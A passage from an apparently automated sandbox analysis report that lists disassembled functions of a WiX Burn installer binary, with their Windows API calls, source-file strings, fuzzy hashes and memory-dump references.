                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,00416EF7,004221A7,EstimatedSize,000000FF,004221A7,00000000,?,00418FB3,00000000,000003C0,00000120,004221A7,?,00000000,00000000), ref: 0046875D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3702945584-1818861729
                                                                                                                                                          • Opcode ID: bf7996e66cec47ba3a0c8293b24234146ad8109b4c5b6725aff94cc48cf5c51a
                                                                                                                                                          • Instruction ID: 031a09fe09c5347a8d1d93f1416eb3570b6e01c7379c50e5dd3e2eeff39b92ac
                                                                                                                                                          • Opcode Fuzzy Hash: bf7996e66cec47ba3a0c8293b24234146ad8109b4c5b6725aff94cc48cf5c51a
                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0F47A2001197BE720160A8C09F5B7B5DEBC5BA5F15003FBB04AB2A0EA788D0186B9
                                                                                                                                                          Function 0046C136 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,0046C30A,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0046C14B
                                                                                                                                                          • GetLastError.KERNEL32(?,0046C30A,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 0046C157
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareErrorLastOrdinalString
                                                                                                                                                          • String ID: Failed to compare version substrings$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                          • API String ID: 2427233125-750196962
                                                                                                                                                          • Opcode ID: d4ceb8d12a29a96ae459c14bf8db2253b38e217b6130fa3e4011fde25a51bff2
                                                                                                                                                          • Instruction ID: fcba94b91296bb32f59355692457cb1f29f4f4e9961512cdc38a75da71fcf81f
                                                                                                                                                          • Opcode Fuzzy Hash: d4ceb8d12a29a96ae459c14bf8db2253b38e217b6130fa3e4011fde25a51bff2
                                                                                                                                                          • Instruction Fuzzy Hash: E0F0783368032977DB315E168C46F9B3F19EF59BA0F414022FD08BA2A2E6758C1086E4
                                                                                                                                                          Function 0046B4BF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
                                                                                                                                                            • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
                                                                                                                                                            • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,0040955C,?,00000000,00000000,?,?,0040D285,0040955C,Hidden,?), ref: 0046B513
                                                                                                                                                          Strings
                                                                                                                                                          • yes, xrefs: 0046B505
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B4F4
                                                                                                                                                          • Failed to get attribute., xrefs: 0046B4E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringVariant$ClearCompareFreeInit
                                                                                                                                                          • String ID: Failed to get attribute.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
                                                                                                                                                          • API String ID: 2896382772-3637628611
                                                                                                                                                          • Opcode ID: 1a0e46dee830c4ac7b467ce9d3b8e3e9e09163af709318c224243648d4e0eb11
                                                                                                                                                          • Instruction ID: 60d5b2e4f816f330f3f1eb8c232bc42f6b6140e510becd287faa7d1abee04a3d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a0e46dee830c4ac7b467ce9d3b8e3e9e09163af709318c224243648d4e0eb11
                                                                                                                                                          • Instruction Fuzzy Hash: 5D012B31A91214BBDB10AA54CC0AFDE3624DB11739F200366F511F61D0E7784B40C7D9
                                                                                                                                                          Function 0040ABA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040ABAF
                                                                                                                                                            • Part of subcall function 00466D48: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,0040ABBB,00000000), ref: 00466D5B
                                                                                                                                                            • Part of subcall function 00466D48: GetProcAddress.KERNEL32(00000000), ref: 00466D62
                                                                                                                                                            • Part of subcall function 00466D48: GetLastError.KERNEL32(?,?,?,?,0040ABBB,00000000), ref: 00466D8C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040ABEF
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040AC01
                                                                                                                                                          • Failed to get native machine value., xrefs: 0040ABC1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                          • String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 896058289-294996902
                                                                                                                                                          • Opcode ID: 2f2444547dfbbe0eb9afca059992627b1bfdc30a1573def485e323fd564c1c20
                                                                                                                                                          • Instruction ID: 68a5767de22f538c8409b43f91f3398123528f6e7a194430583dfbc29119608c
                                                                                                                                                          • Opcode Fuzzy Hash: 2f2444547dfbbe0eb9afca059992627b1bfdc30a1573def485e323fd564c1c20
                                                                                                                                                          • Instruction Fuzzy Hash: 90F0C262B8432076EA22A2558C0AFDF75688F51B61F514167B908BA2C0E5B8D91083DA
                                                                                                                                                          Function 0040B60D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,00000003,Wix,00000003,0040951C,?,0040D49B,00000000,00000000,0040951C,00000000,00000000,0040951C,?), ref: 0040B621
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Attempted to insert variable with reserved prefix: %ls$Wix$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 1825529933-138336430
                                                                                                                                                          • Opcode ID: be799b788d1fe7766c2a2fd27a5edfde35fb5454078e8eb353ce8b4f6bb1dfe9
                                                                                                                                                          • Instruction ID: 3c5691b2860ac69ccd7d324cc9c42fa347cfb5b87d3192ad4a16bf0051f3d5b6
                                                                                                                                                          • Opcode Fuzzy Hash: be799b788d1fe7766c2a2fd27a5edfde35fb5454078e8eb353ce8b4f6bb1dfe9
                                                                                                                                                          • Instruction Fuzzy Hash: D5F0B432780204B7D7212A45AC46FAB3F1DDB45BB4F508036FB0CB91E1837A4A2197ED
                                                                                                                                                          Function 004548D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00454884,00000000,?,004B1DC8,?,?,?,00454A27,00000004,InitializeCriticalSectionEx,004A109C,InitializeCriticalSectionEx), ref: 004548E0
                                                                                                                                                          • GetLastError.KERNEL32(?,00454884,00000000,?,004B1DC8,?,?,?,00454A27,00000004,InitializeCriticalSectionEx,004A109C,InitializeCriticalSectionEx,00000000,?,004547A0), ref: 004548EA
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00454912
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                          • Opcode ID: 45c0965ff09b6eae44e84bcbdbb5948ac9c533d9ec656c96a6466e75432daa1f
                                                                                                                                                          • Instruction ID: 7a3fa78ff10d267587ca394ffd8c7c79158bac7278d59fa51d375c7597436f57
                                                                                                                                                          • Opcode Fuzzy Hash: 45c0965ff09b6eae44e84bcbdbb5948ac9c533d9ec656c96a6466e75432daa1f
                                                                                                                                                          • Instruction Fuzzy Hash: 15E01A70284304B6EF201F61EC06B5A3E55AB60B9AF504071FD0DA85F3DBA9A998968D
                                                                                                                                                          Function 004613E5 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(83C6D434,00000000,00000000,?), ref: 00461448
                                                                                                                                                            • Part of subcall function 0045CDFB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004610BB,?,00000000,-00000008), ref: 0045CE5C
                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0046169A
                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004616E0
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00461783
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                          • Opcode ID: 00dc19f0c96ba897dc6fda23e25b4c04ed3ba04fbbdd60b581d2d7fe7388434a
                                                                                                                                                          • Instruction ID: 45c415e7eca6e4507d1f50f96ff7d7b513590654eeb4a4e79ac9174ea7b97b2e
                                                                                                                                                          • Opcode Fuzzy Hash: 00dc19f0c96ba897dc6fda23e25b4c04ed3ba04fbbdd60b581d2d7fe7388434a
                                                                                                                                                          • Instruction Fuzzy Hash: 43D18EB5D002489FCF15CFA8C8809EDBBB5FF49304F28416AE816EB361E634A942CB55
                                                                                                                                                          Function 0040CC1E Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,00409D1C,00000000,?,00419CB9,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 0040CC2A
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,00409D1C,00000000,?,00419CB9,?,00000001,00000000,?,00000002,-00000001), ref: 0040CC89
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040CC6C
                                                                                                                                                          • Failed to get visibility of variable: %ls, xrefs: 0040CC5A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to get visibility of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-4112153722
                                                                                                                                                          • Opcode ID: 62c37b65326f7110ab9e7d60c420931ac682e27f35e70e62637de2ea66ee2ee6
                                                                                                                                                          • Instruction ID: d5924c863d2eae3708c11c1fa6fb955cb4ed54d7a5808e237ffa23b12c938caf
                                                                                                                                                          • Opcode Fuzzy Hash: 62c37b65326f7110ab9e7d60c420931ac682e27f35e70e62637de2ea66ee2ee6
                                                                                                                                                          • Instruction Fuzzy Hash: B7018F75644218FFEB019F50CC4AF9A3B64EB05365F108162FD09BA2A0D3B89E509BD8
                                                                                                                                                          Function 00463AF7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000), ref: 00463B0E
                                                                                                                                                          • GetLastError.KERNEL32(?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?,?,?,00461D7A,00000000), ref: 00463B1A
                                                                                                                                                            • Part of subcall function 00463AE0: CloseHandle.KERNEL32(FFFFFFFE,00463B2A,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?,?), ref: 00463AF0
                                                                                                                                                          • ___initconout.LIBCMT ref: 00463B2A
                                                                                                                                                            • Part of subcall function 00463AA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00463AD0,00462C4D,?,?,004617D7,?,00000000,00000000,?), ref: 00463AB4
                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?), ref: 00463B3F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                          • Opcode ID: 5029177a88210af471ccdcfa10ef044365a62f5b8dc5003fc47a47d5a50ff4c5
                                                                                                                                                          • Instruction ID: a701651f706a42971ac3a0cf0cddbf973b315f5872623a6979afc5637b6b8209
                                                                                                                                                          • Opcode Fuzzy Hash: 5029177a88210af471ccdcfa10ef044365a62f5b8dc5003fc47a47d5a50ff4c5
                                                                                                                                                          • Instruction Fuzzy Hash: 3BF03036100355BFCF222FD2DC0599A3F66FB087A1F404571FA2885132DA328960EB99
                                                                                                                                                          Function 0046EBFF Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,00437409,?,?), ref: 0046EC0B
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00437409,?,?), ref: 0046EC3E
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp, xrefs: 0046EC30
                                                                                                                                                          • Failed to read message from RPC pipe., xrefs: 0046EC21
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to read message from RPC pipe.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 3168844106-603814421
                                                                                                                                                          • Opcode ID: b4c5395fa60438cc2759e1b09a9c3704ae8306b6ee5dac393804a5e30708473e
                                                                                                                                                          • Instruction ID: 858393c260ef8d8fc3001ebc5628d559f14e6526e325a4ff8af1d35176559212
                                                                                                                                                          • Opcode Fuzzy Hash: b4c5395fa60438cc2759e1b09a9c3704ae8306b6ee5dac393804a5e30708473e
                                                                                                                                                          • Instruction Fuzzy Hash: E4E02B3764021073C2212A999C06EDA7B58DB55F61F404027FA08B6191E3A8581087D5
                                                                                                                                                          Function 004084E0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004084E9
                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,00000000), ref: 00408506
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00408510
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00408517
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterErrorEventLastLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2851136515-0
                                                                                                                                                          • Opcode ID: cfd0d7dfa4ba03dc3df35acae49f5fd58fb69da3c62b566278e4cd981c05efc5
                                                                                                                                                          • Instruction ID: 2fbaa8a15f80dea26e86a689b21129ee392e9b7a2c86c37d9f8f2f233d15e70f
                                                                                                                                                          • Opcode Fuzzy Hash: cfd0d7dfa4ba03dc3df35acae49f5fd58fb69da3c62b566278e4cd981c05efc5
                                                                                                                                                          • Instruction Fuzzy Hash: B8E09236204655B7CB112FB6DC08E8B7BBCFF94365B008036F649E2161DA35E54587A8
                                                                                                                                                          Function 00461C98 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004613E5: GetConsoleOutputCP.KERNEL32(83C6D434,00000000,00000000,?), ref: 00461448
                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000001,?,0045E552,?), ref: 00461E1D
                                                                                                                                                          • GetLastError.KERNEL32(?,0045E552,?,?,00000000,00000000,00000028), ref: 00461E27
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                          • String ID: RE
